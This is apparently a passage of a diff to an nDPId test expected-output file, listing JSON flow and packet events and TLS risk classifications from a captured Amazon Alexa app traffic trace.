+01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195984,"flow_last_seen":1490976196034,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196034,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195985,"flow_last_seen":1490976196037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196037,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2890,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195985,"flow_last_seen":1490976196038,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196038,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2892,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195983,"flow_last_seen":1490976196039,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1667,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976196039,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01348{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2894,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195983,"flow_last_seen":1490976196041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4563,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1490976196041,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images-na.ssl-images-amazon.com","server_names":"images-na.ssl-images-amazon.com,images-eu.ssl-images-amazon.com,images-fe.ssl-images-amazon.com,m.media-amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=Images-na.ssl-images-amazon.com","alpn":"h2,http\/1.1","fingerprint":"39:3D:27:B3:4D:FA:B4:04:AB:48:7F:5C:CB:A9:9A:95:F5:22:2A:52"}} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2910,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":2,"flow_last_seen":1490976196075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976196075,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIa5AAOcGR5A27xyyrBAq2AG74sBbwNFvZBCniXASH\/4cPAAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2911,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_packet_id":3,"flow_last_seen":1490976196075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976196075,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoLWpAAEAG4tysECrYNu8csuLAAbtkEKeJW8DRcFAQAVdmrQAA"} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} -00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976071583,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2913,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196016,"flow_last_seen":1490976196079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196079,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01100{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2929,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196016,"flow_last_seen":1490976196143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976196143,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976071237,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976071286,"flow_last_seen":1490976075975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8626,"flow_avg_l4_payload_len":308,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976071306,"flow_last_seen":1490976075950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5104,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071349,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4754,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071380,"flow_last_seen":1490976075949,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6831,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1490976071385,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":675,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00807{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1490976071583,"flow_last_seen":1490976075957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2936,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1490976196149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976196223,"flow_last_seen":1490976196223,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976196223,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1490976196223,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196223,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Y0xAAEAG+qKsECrYNFXRj5ZTAbu3TOm6AAAAAKAC\/\/+mLwAAAgQFtAQCCAoA9or2AAAAAAEDAwg="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1490976196257,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976196257,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7llOp3LO0t0zpu6AScSBd6wAAAgQFtAQCCApt5QucAPaK9gEDAwg="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1490976196259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976196259,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0Y01AAEAG+qmsECrYNFXRj5ZTAbu3TOm7qdyztYAQAVf8fgAAAQEICgD2ivlt5Quc"} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976196223,"flow_last_seen":1490976196261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976196261,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01128{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2950,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976196223,"flow_last_seen":1490976196300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1642,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1490976196300,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 